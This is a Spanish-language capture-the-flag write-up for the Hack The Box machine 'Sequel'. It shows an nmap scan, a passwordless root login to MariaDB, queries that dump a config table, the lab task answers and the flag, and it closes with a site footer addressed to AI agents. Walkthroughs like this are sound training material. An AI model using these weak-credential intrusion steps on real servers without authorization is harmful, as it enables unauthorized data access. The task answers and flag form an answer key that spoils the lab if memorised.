# Sequel
### 1. 📝 **Introducción**
* **Nivel de Dificultad**: Muy fácil.
* **Tags:**
* **Vulnerability Assessment**: Evaluación de la seguridad y detección de vulnerabilidades en bases de datos y sistemas.
* **Databases**: Análisis de riesgos y brechas de seguridad en bases de datos MySQL.
* **MySQL**: Revisión y auditoría de configuraciones de seguridad en servidores MySQL.
* **SQL**: Identificación de vulnerabilidades y explotación de inyecciones SQL en aplicaciones web.
* **Reconnaissance**: Recolección de información y mapeo de sistemas para identificar posibles puntos de ataque.
* **Weak Credentials**: Detección de credenciales débiles o predeterminadas que comprometen la seguridad del sistema.
### 2. 🛠️ **Entorno**
Nos descargamos nuestra VPN y nos conectamos.
```
sudo openvpn nombre_del_archivo.vpn
```
Iniciamos la máquina y verificamos la conexión.
```bash
ping -c 1 10.129.241.245
```
Observamos que tenemos conexión y que es una máquina **Linux** ya que su **ttl=63**.
### 3. 🔍 **Reconocimiento**
A continuación, se realiza el comando:
```bash
nmap -p- --min-rate 5000 -sV 10.129.241.245
```
para realizar un escaneo de puertos y servicios detallado en la dirección IP.
### 4. 🚪 **Acceso Inicial**
Como podemos observar durante el escaneo, el puerto **3306** perteneciendo al servicio **MySQL** está abierto, por lo que se procederá a indagar más.
```bash
mysql -h 10.129.241.245 -u root
```
### 5. 🔑 **Captura de la Flag**
```bash
show databases;
use htb;
show tables;
select * from config;
```
### 6. ❓Preguntas
#### **Tarea 1:** Durante nuestro escaneo, ¿ qué puerto encontramos sirviendo MySQL?
**3306**\
\&#xNAN;*El puerto 3306 es el puerto estándar utilizado por MySQL para comunicaciones con bases de datos.*
#### **Tarea 2:** ¿Qué versión de MySQL desarrollada por la comunidad está ejecutándose en el objetivo?
**MariaDB**\
\&#xNAN;*La versión de MySQL que se está utilizando es MariaDB, una bifurcación desarrollada por la comunidad.*
#### **Tarea 3:** Al usar el cliente de línea de comandos de MySQL, ¿qué opción necesitamos usar para especificar un nombre de usuario para iniciar sesión?
**-u**\
\&#xNAN;*La opción -u se utiliza para especificar el nombre de usuario en el cliente de línea de comandos de MySQL.*
#### **Tarea 4:** ¿Qué nombre de usuario nos permite iniciar sesión en esta instancia de MariaDB sin proporcionar una contraseña?
**root**\
\&#xNAN;*El nombre de usuario root permite iniciar sesión sin contraseña en muchas configuraciones predeterminadas de MariaDB.*
#### **Tarea 5:** En SQL, ¿ qué símbolo se usa para especificar dentro de la consulta que queremos mostrar todo lo que hay en una tabla?
**\***\
\&#xNAN;*El símbolo \* se utiliza en SQL para seleccionar todos los campos de una tabla.*
#### **Tarea 6:** En SQL, ¿qué símbolo necesitamos para terminar cada consulta?
**;**\
\&#xNAN;*El símbolo ; se usa para finalizar cada consulta en SQL.*
#### **Tarea 7:** Hay tres bases de datos en esta instancia de MySQL que son comunes a todas las instancias de MySQL. ¿Cuál es el nombre de la cuarta que es única para este host?
**htb**\
\&#xNAN;*La cuarta base de datos única para este host se llama htb.*
#### Tarea 8: Enviar Flag
7b4bec00d1a39e3dd4e021ec3d915da8
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/starting-point/sequel.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.